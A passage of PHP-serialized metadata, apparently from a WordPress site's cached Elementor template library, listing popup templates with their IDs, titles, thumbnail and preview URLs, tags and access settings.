DJ\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/DJ-service-46-small.jpg\";s:12:\"tmpl_created\";i:1647510160;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/hello-bar-booking-event-dj/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:31:\"[\"Booking\",\"Events\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:31;a:19:{s:4:\"tmpl\";i:1314;s:2:\"id\";i:22684;s:5:\"title\";s:36:\"Fly-In | Discount | Cleaning Company\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2022/03/51-cleaning-company-Discount.jpg\";s:12:\"tmpl_created\";i:1647510546;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/fly-in-discount-cleaning-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:31:\"[\"Discount\",\"Offer\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:32;a:19:{s:4:\"tmpl\";i:1315;s:2:\"id\";i:22693;s:5:\"title\";s:28:\"Fly-In | Contact | Carpenter\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2022/03/carpenter-53-small.jpg\";s:12:\"tmpl_created\";i:1647511972;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/popups/fly-in-contact-carpenter/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:22:\"[\"Contact\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:33;a:19:{s:4:\"tmpl\";i:1316;s:2:\"id\";i:22703;s:5:\"title\";s:31:\"Classic | Booking | Yoga Studio\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/03/55-yoga-studio-Contact-Us.jpg\";s:12:\"tmpl_created\";i:1647512209;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/classic-booking-yoga-studio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:30:\"[\"Booking\",\"Contact\",\"Health\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:34;a:19:{s:4:\"tmpl\";i:1317;s:2:\"id\";i:22714;s:5:\"title\";s:37:\"Classic | Discount | Pet Care Company\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/56-Pet-Care-Discount.jpg\";s:12:\"tmpl_created\";i:1647513031;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/popups/classic-discount-pet-care-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:17:\"[\"Offer\",\"Sales\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:35;a:19:{s:4:\"tmpl\";i:1318;s:2:\"id\";i:22725;s:5:\"title\";s:38:\"Fly-In | Discount | Online Coffee Shop\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2022/03/online-coffee-shop-57-small.jpg\";s:12:\"tmpl_created\";i:1647513325;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:140:\"https://library.elementor.com/popups/fly-in-discount-online-coffee-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:29:\"[\"Food\",\"Offer\",\"Restaurant\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:36;a:19:{s:4:\"tmpl\";i:1319;s:2:\"id\";i:22737;s:5:\"title\";s:44:\"Fly-In | CTA | Moving &#038; Storage Company\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/03/moving-company-59-small.jpg\";s:12:\"tmpl_created\";i:1647520956;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/popups/fly-in-cta-moving-storage-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:12:\"[\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:37;a:19:{s:4:\"tmpl\";i:1320;s:2:\"id\";i:22749;s:5:\"title\";s:47:\"Classic | Contact | Industrial Design Portfolio\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2022/03/60-industrial-design-Contact-Us.jpg\";s:12:\"tmpl_created\";i:1647528116;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:149:\"https://library.elementor.com/popups/classic-contact-industrial-design-portfolio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:40:\"[\"Contact\",\"Interior Design\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:38;a:19:{s:4:\"tmpl\";i:1321;s:2:\"id\";i:22759;s:5:\"title\";s:25:\"Classic | Contact | Drone\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2022/03/drone-61-small.jpg\";s:12:\"tmpl_created\";i:1647528899;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/popups/classic-contact-drone/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:22:\"[\"Contact\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:39;a:19:{s:4:\"tmpl\";i:1322;s:2:\"id\";i:22768;s:5:\"title\";s:46:\"Full Screen | Menu | Fashion Stylist Portfolio\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/03/62-Fashion-Stylist-Menu.jpg\";s:12:\"tmpl_created\";i:1647529434;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:148:\"https://library.elementor.com/popups/full-screen-menu-fashion-stylist-portfolio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:31:\"[\"Fashion\",\"Fullscreen\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:40;a:19:{s:4:\"tmpl\";i:1323;s:2:\"id\";i:22780;s:5:\"title\";s:31:\"Fly-In | CTA | Landscape Design\";s:9:\"thumbnail\";s:94:\"https://library.elementor.com/wp-content/uploads/2022/03/64-Landscape-Design-Click-Through.jpg\";s:12:\"tmpl_created\";i:1647530337;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/fly-in-cta-landscape-design/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:18:\"[\"cta\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:41;a:19:{s:4:\"tmpl\";i:1324;s:2:\"id\";i:22790;s:5:\"title\";s:48:\"Bottom Bar  | Contact | Architecture Photography\";s:9:\"thumbnail\";s:94:\"https://library.elementor.com/wp-content/uploads/2022/03/architecture-photography-65-small.jpg\";s:12:\"tmpl_created\";i:1647532358;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:149:\"https://library.elementor.com/popups/bottom-bar-contact-architecture-photography/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:17:\"essential-oct2023\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:26:\"[\"Architecture\",\"Contact\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:42;a:19:{s:4:\"tmpl\";i:1325;s:2:\"id\";i:22800;s:5:\"title\";s:41:\"Fly-In  | CTA | Speech-Language Therapist\";s:9:\"thumbnail\";s:103:\"https://library.elementor.com/wp-content/uploads/2022/03/66-Speech-Language-Therapist-Click-Through.jpg\";s:12:\"tmpl_created\";i:1647532720;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:142:\"https://library.elementor.com/popups/fly-in-cta-speech-language-therapist/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:25:\"[\"cta\",\"Psychotherapist\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:43;a:19:{s:4:\"tmpl\";i:1326;s:2:\"id\";i:22812;s:5:\"title\";s:35:\"Full Screen | Verification | Winery\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/03/67-Winery-Verification.jpg\";s:12:\"tmpl_created\";i:1647761384;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:137:\"https://library.elementor.com/popups/full-screen-verification-winery/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:24:\"[\"Alert\",\"Verification\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:44;a:19:{s:4:\"tmpl\";i:1327;s:2:\"id\";i:22822;s:5:\"title\";s:36:\"Fly-In | Subscription | Nutritionist\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/03/nutritionist-69-small.jpg\";s:12:\"tmpl_created\";i:1647762620;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/fly-in-subscription-nutritionist/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:28:\"[\"Food\",\"Health\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:45;a:19:{s:4:\"tmpl\";i:1328;s:2:\"id\";i:22833;s:5:\"title\";s:40:\"Classic | Subscription | App &#038; SaaS\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2022/03/app-70-small.jpg\";s:12:\"tmpl_created\";i:1647762955;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/popups/classic-subscription-app-saas/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:14:\"[\"App\",\"SaaS\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:46;a:19:{s:4:\"tmpl\";i:1329;s:2:\"id\";i:22844;s:5:\"title\";s:41:\"Bottom Bar | Discount | Handmade Cupcakes\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2022/03/72-Handmade-Cupcakes-Discount.jpg\";s:12:\"tmpl_created\";i:1647763350;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:143:\"https://library.elementor.com/popups/bottom-bar-discount-handmade-cupcakes/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:21:\"[\"Food\",\"Restaurant\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:47;a:19:{s:4:\"tmpl\";i:1330;s:2:\"id\";i:22855;s:5:\"title\";s:40:\"Bottom Bar | Subscription | Fashion Blog\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/03/fashion-blog-75-small.jpg\";s:12:\"tmpl_created\";i:1647763907;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:142:\"https://library.elementor.com/popups/bottom-bar-subscription-fashion-blog/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:30:\"[\"Blog\",\"Fashion\",\"Subscribe\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:48;a:19:{s:4:\"tmpl\";i:1331;s:2:\"id\";i:22866;s:5:\"title\";s:28:\"Fly-In | CTA | Private Tutor\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/03/private-tutor-77-small.jpg\";s:12:\"tmpl_created\";i:1647764062;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/popups/fly-in-cta-private-tutor/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:49;a:19:{s:4:\"tmpl\";i:1332;s:2:\"id\";i:22876;s:5:\"title\";s:30:\"Classic | CTA | Tennis Academy\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2022/03/78-Tennis-Academy-Click-Through.jpg\";s:12:\"tmpl_created\";i:1647765192;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/classic-cta-tennis-academy/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:7:\"[\"cta\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:50;a:19:{s:4:\"tmpl\";i:1333;s:2:\"id\";i:22887;s:5:\"title\";s:31:\"Fly-In | CTA | Shared Workspace\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/03/shared-workspace-79-small.jpg\";s:12:\"tmpl_created\";i:1647765419;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/fly-in-cta-shared-workspace/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:18:\"[\"Business\",\"cta\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:51;a:19:{s:4:\"tmpl\";i:1334;s:2:\"id\";i:22899;s:5:\"title\";s:30:\"Bottom Bar | CTA | Art Gallery\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2022/03/80-Art-Gallery-Click-Through.jpg\";s:12:\"tmpl_created\";i:1647765652;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/bottom-bar-cta-art-gallery/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:13:\"[\"Art\",\"cta\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:52;a:19:{s:4:\"tmpl\";i:1335;s:2:\"id\";i:22910;s:5:\"title\";s:44:\"Fly-In | Subscription | Hiking Tours Company\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2022/03/hiking-tours-company-81-small.jpg\";s:12:\"tmpl_created\";i:1647765835;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:146:\"https://library.elementor.com/popups/fly-in-subscription-hiking-tours-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:29:\"[\"Subscribe\",\"Travel\",\"Trip\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:53;a:19:{s:4:\"tmpl\";i:1336;s:2:\"id\";i:22921;s:5:\"title\";s:26:\"Classic | CTA | Music Band\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/music-band-82-small.jpg\";s:12:\"tmpl_created\";i:1647769462;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/popups/classic-cta-music-band/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:21:\"[\"Marketing\",\"Music\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:54;a:19:{s:4:\"tmpl\";i:1337;s:2:\"id\";i:22935;s:5:\"title\";s:35:\"Classic | CTA | Computer Technician\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2022/03/comuter-technician-83-small.jpg\";s:12:\"tmpl_created\";i:1647769843;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:137:\"https://library.elementor.com/popups/classic-cta-computer-technician/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:18:\"[\"cta\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:55;a:19:{s:4:\"tmpl\";i:1338;s:2:\"id\";i:22945;s:5:\"title\";s:37:\"Classic | Discount | Delivery Company\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/03/delivery-company-88-small.jpg\";s:12:\"tmpl_created\";i:1647770834;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/popups/classic-discount-delivery-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:23:\"[\"Discount\",\"Services\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:56;a:19:{s:4:\"tmpl\";i:1339;s:2:\"id\";i:22959;s:5:\"title\";s:29:\"Classic | Discount | Eco Shop\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2022/03/echo-shop-89-small.jpg\";s:12:\"tmpl_created\";i:1647771211;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/popups/classic-discount-eco-shop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:24:\"[\"Discount\",\"Ecommerce\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:57;a:19:{s:4:\"tmpl\";i:1340;s:2:\"id\";i:22972;s:5:\"title\";s:54:\"Fly-In | Subscription | Health &#038; Mindfulness Blog\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/health-blog-91-small.jpg\";s:12:\"tmpl_created\";i:1647771461;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:149:\"https://library.elementor.com/popups/fly-in-subscription-health-mindfulness-blog/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:21:\"[\"Health\",\"Magazine\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:58;a:19:{s:4:\"tmpl\";i:1341;s:2:\"id\";i:22982;s:5:\"title\";s:31:\"Full Screen | Menu | Art Museum\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/03/art-museum-112-small.jpg\";s:12:\"tmpl_created\";i:1647771938;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/full-screen-menu-art-museum/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:21:\"[\"Fullscreen\",\"menu\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:59;a:19:{s:4:\"tmpl\";i:1342;s:2:\"id\";i:22992;s:5:\"title\";s:40:\"Classic | Discount | Urban Clothing 